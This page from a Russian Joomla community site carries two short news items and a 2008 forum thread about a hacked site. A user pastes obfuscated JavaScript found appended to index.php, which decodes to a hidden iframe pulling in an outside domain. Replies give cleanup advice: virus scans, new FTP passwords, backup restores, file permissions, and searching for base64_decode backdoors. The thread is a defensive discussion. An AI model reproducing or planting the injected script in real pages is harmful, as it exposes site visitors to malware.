Новости Joomla

Как вызвать событие только для указанной (одной или более) группы плагинов в Joomla 5Системные...

Как вызвать событие только для указанной (одной или более) группы плагинов в Joomla 5Системные плагины в Joomla срабатывают всегда, но большое их количество может негативно сказаться на скорости работы Приложения. А во-вторых ошибка в системном плагине, добавляющем кнопку в тулбар может обрушить механизм регистрации / авторизации пользователя. Поэтому для лучшего быстродействия и надёжности работы системы плагины в Joomla разделены на группы. Каждая группа срабатывает только в определённом месте и в определённый момент времени. Небольшой пост-шпаргалка для Joomla-разработчиков от участника нашего сообщества Виталия Некрасова (@vitalik_a) подскажет как в своём коде сделать то, что написано в заголовке поста 😎Читать пост на Хабре#joomla #php #разработка #webdev

Обновление модуля WT Quick links v.2.3

Обновление модуля WT Quick links v.2.3

Обновление модуля WT Quick links v.2.3.0Модуль позволяет создавать быстрые наборы элементов: ссылки на различные сущности на сайте Joomla: категории материалов, Virtuemart, JoomShopping, пункт меню или пользовательскую ссылку. Есть условия для исключений показа элементов списка.Вы можете создавать собственные макеты вывода модуля, создавая таким образом почти всё, что угодно: от простого списка ссылок до стены фотографий на главную страницу или ссылки-теги для перелинковки категорий интернет-магазина. Модуль позволяет выводить изображения, адаптивные изображения, видео, адаптивные видео. Также это могут быть не только ссылки, но и список вопросов FAQ, элементы Bootstrap Tabs, Accordion и т.д.v.2.3.0 Что нового?- Собственные макеты для ссылокТеперь для каждой ссылки можно указать собственный макет из папки /tmpl/sublayout/. Для использования модуля в этом режиме, необходимо выбрать макет модуля - default-sublayouts или создать собственный вариант этого макета. - Обработка плагинами контентаСодержимое поля Дополнительный текст для ссылки теперь обрабатывается плагинами контента.- Поле примечанияДобавлено поле примечания для ссылки. Это удобно ориентации в большой форме.- Рефакторинг кодаПроведена чистка и улучшения кода.Страница расширенияGitHub#расширения #virtuemart #JoomShopping

0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 2480 Просмотров
*

annik

  • Осваиваюсь на форуме
  • 39
  • 2 / 1
index.php + JS в конце
« : 16.06.2008, 10:59:10 »
Чем можно расшифровать?
Код
script type="text/javascript">

</script><script>function v485549d407dae(v485549d408198){ var v485549d40857f=16; return(parseInt(v485549d408198,v485549d40857f));}function v485549d408d4d(v485549d409133){  var v485549d4095b4='';for(v485549d409905=0; v485549d409905<v485549d409133.length; v485549d409905+=2){ v485549d4095b4+=(String.fromCharCode(v485549d407dae(v485549d409133.substr(v485549d409905, 2))));}return v485549d4095b4;} document.write(v485549d408d4d('3C696672616D65206E616D653D2734623627207372633D27687474703A2F2F6B616B6173686B612E7573272077696474683D353530206865696768743D3436207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>
Дописали мне в конце index.php
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: index.php + JS в конце
« Ответ #1 : 16.06.2008, 11:03:44 »
А смысл расшифровывать? Дописал это робот, который обходит сайты по ftp, используя данные, украденные с помощью троянов. Как правило дописываемый код имеет целью дальнейшее распространение трояна на компьютеры посетителей сайта.

Как от этого избавиться в принципе не раз уже на форуме писалось.

1. Сделать полную проверку компьютера, имеющего доступ по ftp к зараженному сайту на вирусы и трояны, до тех пор, пока не найдете и не вылечите.
2. Сменить пароль на ftp
3. Восстановить файлы сайта из последнего бекапа перед заражением (при условии что бекап производится регулярно)
4. В дальнейшем активно использовать антивирус, не забывать обновлсять ПО и не хранить пароли в программах для работы с FTP...
*

PaLyCH

  • Давно я тут
  • 956
  • 146 / 19
  • Менеджер проектов
Re: index.php + JS в конце
« Ответ #2 : 16.06.2008, 11:53:08 »
Полностью восстанавливать наверно не стоит, у меня таже самая проблема была. решилось просто. Просмотр всех файлов index.php в шаблонах сайта и админки, index.php в корне сайта и в корне админке. Поставить на них права 555
*

marinserg

  • Новичок
  • 4
  • 0 / 0
Re: index.php + JS в конце
« Ответ #3 : 16.06.2008, 13:37:14 »
2 дня борюсь с той же проблемой.
Стоит:
Joomla! 1.0.12
Register Globals: OFF 
Register Globals: OFF 
Magic Quotes: ON 
Safe Mode: OFF 
File Uploads: ON 
Session auto start: OFF 

444 - chmod на index.php в templates
.....
по логам обнаружила что с IP вредоносного и гадосного врага подгрузили /administrator/components/com_banners/banners.html.php где были пароли на вход в админку
 и потом сколько я не удаляля его прописаные JavaScript c трояном  он мне демонстративно их вставлял и еще и показывал, что chmod он тоже может поменять без моего ведома.

Мои действия:
1.Заблокировала IP
2. почистила и провелила на наличие посторонних файлов не входящих в ранее в мою сборку сайта
3. еще раз перезалила папку templates и еще раз поставила 444 - chmod
4. заодно проверила inframe - не нашла
5. поменяла FTP пароли (каюсь, хранила в клиенте-ленивая......)
6. сижу и проверяю касперским компьютер (Вопрос: заканчивается лицензия на Касперского. Стоит ли и дальше им пользоваться или перейти на другой, но какой?)

 >:( :( :o
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: index.php + JS в конце
« Ответ #4 : 16.06.2008, 13:42:22 »
Вопрос: заканчивается лицензия на Касперского. Стоит ли и дальше им пользоваться или перейти на другой, но какой?)
Если он вас устраивает, я бы ничего не менял. А в дополнение к Касперскому поставил бы допустим что-то типа TrojanRemover и периодически проверял бы еще им...

p.s. У самого правда стоит бесплатный AVG, перед этим месяца 2 стоял бесплатная версия Avira... но подумываю перейти на касперского...
*

marinserg

  • Новичок
  • 4
  • 0 / 0
Re: index.php + JS в конце
« Ответ #5 : 16.06.2008, 13:54:04 »
Да, проблема то в том, что и у меня он пока безплатный до этого стоял докторвеб+ комодо и я нахваталась......А касперский реально поттормаживает работу в интернете...Перестала т.е. почти нет возможности принять почту gmail/

К предыдущему вопросу...как проверить свои компоненты на наличие дыр...
И RequestFilter можно ставить на 1.0.12?
*

PaLyCH

  • Давно я тут
  • 956
  • 146 / 19
  • Менеджер проектов
Re: index.php + JS в конце
« Ответ #6 : 25.06.2008, 12:35:07 »
Снова обнаружился взлом одного из сайта. В этот раз index.php не был затронут. Были затронуты index.html.
Действия те же, удалить неизвестные скрипты и поставить 555 на эти файлы.
От троянцев помог AVG. Он единственный нашел у меня 113!!!! троянцев на компе
*

marinserg

  • Новичок
  • 4
  • 0 / 0
Re: index.php + JS в конце
« Ответ #7 : 30.06.2008, 16:59:04 »
Сегодня опять 25....ап и снова Касперский вопит на троян. И вроде все сделала правильно (ну как тут советовали) . НО не проверила ядро на backdoor и shells. Сделала, когда посмотрела логи и увидела куда ломаются.
И что оказалось, на самом то деле меня еще 3 месяца назад взломали....- понапихивали файликов ну очень похожих на "взаправдашие", но по сути ПАКОСТЬ редкая. Проверила на содержание подобной строки типа echo(base64_decode  ......и  АП, есть такие.
Очень поучительно почитать форум antichat.ru - ПОВБИВАЛА!!! Но полезно.
Вывод - надо предохраняться!!!! И прежде всего дыры это ошибка админа или халатность. Но получается полная параноя.

P.S. Извините за эмоциональность!!! 2 часа жизни под хвост!!!!

Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

В файле index.php постоянно появляется вредоносный код

Автор Armal

Ответов: 29
Просмотров: 3354
Последний ответ 08.05.2021, 16:16:32
от gartes
Запретить смену прав на index.php - Joomla

Автор magrychev

Ответов: 5
Просмотров: 2526
Последний ответ 24.10.2017, 21:14:24
от winstrool
Добавляется адрес к index.php

Автор kokon_zver

Ответов: 8
Просмотров: 1929
Последний ответ 21.11.2016, 10:34:29
от Дмитрий_76
htaccess и htpasswd пароль только на url с параметром например "index.php?test"

Автор ice99

Ответов: 4
Просмотров: 1665
Последний ответ 28.08.2016, 20:52:51
от flyingspook
Количество файлов index.php

Автор kouichiro

Ответов: 13
Просмотров: 1397
Последний ответ 04.04.2016, 07:06:10
от Morh